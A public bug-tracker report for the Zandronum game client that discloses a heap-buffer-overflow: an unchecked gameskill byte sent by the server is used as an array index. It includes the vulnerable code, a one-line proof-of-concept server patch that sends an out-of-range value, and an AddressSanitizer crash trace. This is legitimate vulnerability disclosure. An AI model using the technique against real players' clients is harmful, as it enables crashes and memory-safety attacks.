Zandronum Chat @ irc.zandronum.com
#zandronum
Get the latest version: 3.0
Source Code

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0003828Zandronum[All Projects] Securitypublic2020-06-16 18:572020-06-16 18:58
Reportermmmds 
Assigned To 
PrioritynormalSeveritycrashReproducibilityalways
StatusnewResolutionopen 
Platformx86-64OSUbuntuOS Version18.04
Product Version3.0 
Target VersionFixed in Version 
Summary0003828: Array index coming from the server (heap-buffer-overflow)
DescriptionDuring the match, the client receives `gameskill` value from the server.

```
File: zandronum_build/zandronum/src/cl_main.cpp
1274: void CLIENT_ProcessCommand( LONG lCommand, BYTESTREAM_s *pByteStream )
1275: {
[...]
1482: case SVC_SETGAMESKILL:
1483:
1484: client_SetGameSkill( pByteStream );
1485: break;
1486: case SVC_SETGAMEDMFLAGS:
[...]
5574: static void client_SetGameSkill( BYTESTREAM_s *pByteStream )
5575: {
5576: UCVarValue Value;
5577:
5578: // Read in the gameskill setting, and set gameskill to this setting.
5579: Value.Int = NETWORK_ReadByte( pByteStream );
5580: gameskill.ForceSet( Value, CVAR_Int );
[...]
```

Later, this value is used as an index for `AllSkills array`. The server can cause the client to read data outside the buffer.

```
File: zandronum/src/g_skill.cpp
322: int G_SkillProperty(ESkillProperty prop)
323: {
324: if (AllSkills.Size() > 0)
325: {
326: switch(prop)
327: {
328: case SKILLP_AmmoFactor:
329: if (dmflags2 & DF2_YES_DOUBLEAMMO)
330: {
331: return AllSkills[gameskill].DoubleAmmoFactor;
332: }
333: return AllSkills[gameskill].AmmoFactor;
334:
335: case SKILLP_DropAmmoFactor:
336: return AllSkills[gameskill].DropAmmoFactor;
337:
338: case SKILLP_DamageFactor:
339: return AllSkills[gameskill].DamageFactor;
340:
341: case SKILLP_FastMonsters:
342: return AllSkills[gameskill].FastMonsters || (dmflags & DF_FAST_MONSTERS);
343:
[...]
```
Steps To ReproducePoC:
Modify the server's code to send malicious value.

```
diff -r 10af1739daa3 src/sv_commands.cpp
--- a/src/sv_commands.cpp Sun Oct 13 21:38:53 2019 +0200
+++ b/src/sv_commands.cpp Thu Jun 11 11:44:37 2020 -0400
@@ -2091,7 +2091,7 @@
 void SERVERCOMMANDS_SetGameSkill( ULONG ulPlayerExtra, ServerCommandFlags flags )
 {
        NetCommand command( SVC_SETGAMESKILL );
- command.addByte( gameskill );
+ command.addByte( 150 );
        command.addByte( botskill );
        command.sendCommandToClients( ulPlayerExtra, flags );
 }
```
```
$ ./zandronum-server
```

The client (compiled with ASAN) crashes while connecting to the server.

```
$ ./zandronum -connect 127.0.0.1 10666
Gtk-Message: 11:42:31.959: Failed to load module "canberra-gtk-module"
Zandronum 3.0.1 - 191013-1938 - SDL version
Compiled on Jun 8 2020
Using video driver x11

M_LoadDefaults: Load system defaults.
Gameinfo scan took 0 ms
W_Init: Init WADfiles.
 adding /home/mmm/zandronum_build/zandronum/buildclient-asan/zandronum.pk3, 689 lumps
 adding /home/mmm/.config/zandronum/freedm.wad, 3655 lumps
I_Init: Setting up machine state.
CPU Vendor ID: GenuineIntel
  Name: Intel(R) Core(TM) i5-9300H CPU @ 2.40GHz
  Family 6, Model 158, Stepping 10
  Features: MMX SSE SSE2 SSE3 SSSE3 SSE4.1 SSE4.2
I_InitSound: Initializing FMOD
FMOD Sound System, copyright � Firelight Technologies Pty, Ltd., 1994-2009.
Loaded FMOD version 4.24.16
OSS could not be initialized. Trying ALSA.
V_Init: allocate screen.
Using in-memory database. The database will not be saved on exit.
S_Init: Setting up sound.
ST_Init: Init startup screen.
Checking cmd-line parameters...
S_InitData: Load sound definitions.
G_ParseMapInfo: Load map definitions.
Texman.Init: Init texture manager.
ParseTeamInfo: Load team definitions.
LoadActors: Load actor definitions.
R_Init: Init Doom refresh subsystem.
DecalLibrary: Load decals.
Adding dehacked patch freedm.wad:DEHACKED
Patch installed
PWO_Init: Initializing preferred weapon order.
M_Init: Init menus.
P_Init: Init Playloop state.
ParseSBarInfo: Loading default status bar definition.
ParseSBarInfo: Loading custom status bar definition.
===========================================================================
This is FreeDM, the free content deathmatch FPS.

FreeDM is freely redistributable under the terms of the modified BSD
license. Check out the Freedoom website for more information:

    https://freedoom.github.io/
============================================================================
D_CheckNetGame: Checking network game status.
player 1 of 1 (1 nodes)
Initializing network subsystem.
IP address 127.0.1.1:10667
UDP Initialized.
Resolution: 640 x 480
Connecting to 127.0.0.1:10666
Connecting to 127.0.0.1:10666
Connecting to 127.0.0.1:10666
Connected!
Authenticating level...
Level authenticated!


MAP01 - Tech Test

Requesting snapshot...
Receiving snapshot...
Version 3.0.1 Server
Starting MIDI playback failed
=================================================================
==8282==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61e000010864 at pc 0x561894094fa4 bp 0x7ffe782f9080 sp 0x7ffe782f9070
READ of size 1 at 0x61e000010864 thread T0
    #0 0x561894094fa3 in G_SkillProperty(ESkillProperty) /home/mmm/zandronum_build/zandronum/src/g_skill.cpp:342
    #1 0x56189432ab63 in AActor::isFast() /home/mmm/zandronum_build/zandronum/src/p_mobj.cpp:5210
    0000002 0x561894327fb5 in AActor::StaticSpawn(PClass const*, int, int, int, replace_t, bool) /home/mmm/zandronum_build/zandronum/src/p_mobj.cpp:4905
    0000003 0x561893edaa02 in Spawn(PClass const*, int, int, int, replace_t) /home/mmm/zandronum_build/zandronum/src/./actor.h:1315
    0000004 0x561893f70823 in ServerCommands::SpawnPlayer::Execute() /home/mmm/zandronum_build/zandronum/src/cl_main.cpp:3317
    0000005 0x5618941290a9 in CLIENT_ParseServerCommand(tagSVC, BYTESTREAM_s*) /home/mmm/zandronum_build/zandronum/src/network/servercommands.cpp:289
    0000006 0x561893f6768a in CLIENT_ProcessCommand(long, BYTESTREAM_s*) /home/mmm/zandronum_build/zandronum/src/cl_main.cpp:1271
    0000007 0x561893f6724c in CLIENT_ParsePacket(BYTESTREAM_s*, bool) /home/mmm/zandronum_build/zandronum/src/cl_main.cpp:1235
    0000008 0x561893f663a5 in CLIENT_GetPackets() /home/mmm/zandronum_build/zandronum/src/cl_main.cpp:967
    0000009 0x56189404f8a5 in G_Ticker() /home/mmm/zandronum_build/zandronum/src/g_game.cpp:1523
    0000010 0x561893ffac6b in TryRunTics() /home/mmm/zandronum_build/zandronum/src/d_net.cpp:1903
    0000011 0x561893fe58a2 in D_DoomLoop() /home/mmm/zandronum_build/zandronum/src/d_main.cpp:1322
    0000012 0x561893fee625 in D_DoomMain() /home/mmm/zandronum_build/zandronum/src/d_main.cpp:3278
    0000013 0x561893ea4d7a in main /home/mmm/zandronum_build/zandronum/src/sdl/i_main.cpp:380
    0000014 0x7fce0debeb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    0000015 0x561893e97f69 in _start (/home/mmm/zandronum_build/zandronum/buildclient-asan/zandronum+0x524f69)

0x61e000010864 is located 28 bytes to the left of 2817-byte region [0x61e000010880,0x61e000011381)
freed by thread T0 here:
    #0 0x7fce114a7480 in operator delete[](void*) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe1480)
    #1 0x561894b0341b in CheckIfPatch /home/mmm/zandronum_build/zandronum/src/textures/patchtexture.cpp:119
    0000002 0x561894b034e5 in PatchTexture_TryCreate(FileReader&, int) /home/mmm/zandronum_build/zandronum/src/textures/patchtexture.cpp:136
    0000003 0x561894b11af1 in FTexture::CreateTexture(int, int) /home/mmm/zandronum_build/zandronum/src/textures/texture.cpp:107
    0000004 0x561894b18455 in FTextureManager::CreateTexture(int, int) /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:402
    0000005 0x561894b18df1 in FTextureManager::AddGroup(int, int, int) /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:504
    0000006 0x561894b1b19f in FTextureManager::AddTexturesForWad(int) /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:816
    0000007 0x561894b1c06c in FTextureManager::Init() /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:979
    0000008 0x561893fed240 in D_DoomMain() /home/mmm/zandronum_build/zandronum/src/d_main.cpp:2970
    0000009 0x561893ea4d7a in main /home/mmm/zandronum_build/zandronum/src/sdl/i_main.cpp:380
    0000010 0x7fce0debeb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

previously allocated by thread T0 here:
    #0 0x7fce114a6608 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0608)
    #1 0x561894b0318b in CheckIfPatch /home/mmm/zandronum_build/zandronum/src/textures/patchtexture.cpp:88
    0000002 0x561894b034e5 in PatchTexture_TryCreate(FileReader&, int) /home/mmm/zandronum_build/zandronum/src/textures/patchtexture.cpp:136
    0000003 0x561894b11af1 in FTexture::CreateTexture(int, int) /home/mmm/zandronum_build/zandronum/src/textures/texture.cpp:107
    0000004 0x561894b18455 in FTextureManager::CreateTexture(int, int) /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:402
    0000005 0x561894b18df1 in FTextureManager::AddGroup(int, int, int) /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:504
    0000006 0x561894b1b19f in FTextureManager::AddTexturesForWad(int) /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:816
    0000007 0x561894b1c06c in FTextureManager::Init() /home/mmm/zandronum_build/zandronum/src/textures/texturemanager.cpp:979
    0000008 0x561893fed240 in D_DoomMain() /home/mmm/zandronum_build/zandronum/src/d_main.cpp:2970
    0000009 0x561893ea4d7a in main /home/mmm/zandronum_build/zandronum/src/sdl/i_main.cpp:380
    0000010 0x7fce0debeb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/mmm/zandronum_build/zandronum/src/g_skill.cpp:342 in G_SkillProperty(ESkillProperty)
Shadow bytes around the buggy address:
  0x0c3c7fffa0b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c7fffa0c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c7fffa0d0: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3c7fffa0e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3c7fffa0f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c3c7fffa100: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
  0x0c3c7fffa110: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c7fffa120: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c7fffa130: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c7fffa140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3c7fffa150: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable: 00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone: fa
  Freed heap region: fd
  Stack left redzone: f1
  Stack mid redzone: f2
  Stack right redzone: f3
  Stack after return: f5
  Stack use after scope: f8
  Global redzone: f9
  Global init order: f6
  Poisoned by user: f7
  Container overflow: fc
  Array cookie: ac
  Intra object redzone: bb
  ASan internal: fe
  Left alloca redzone: ca
  Right alloca redzone: cb
==8282==ABORTING
```
Additional InformationEnvironment:
- Ubuntu 18.04
- Zandronum version 3.0.1
```
$ hg summary
parent: 10174:10af1739daa3 ZA_3.0.1
```
- ASAN compilation
```
cmake .. -DCMAKE_BUILD_TYPE=Debug -DSERVERONLY=ON -DUSE_SYSTEM_EVENT2=ON -DCMAKE_CXX_FLAGS="-fsanitize=address -ggdb3 -O0 -pthread" -DCMAKE_C_FLAGS="-fsanitize=address -ggdb3 -O0 -pthread" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address"
ASAN_OPTIONS=detect_leaks=0 make -j4
```
Attached Files

- Relationships

-  Notes
There are no notes attached to this issue.

Issue Community Support
Only registered users can voice their support. Click here to register, or here to log in.
Supporters: No one explicitly supports this issue yet.
Opponents: No one explicitly opposes this issue yet.

- Issue History
Date Modified Username Field Change
2020-06-16 18:57 mmmds New Issue






Questions or other issues? Contact Us.

Links


Copyright © 2000 - 2020 MantisBT Team
Powered by Mantis Bugtracker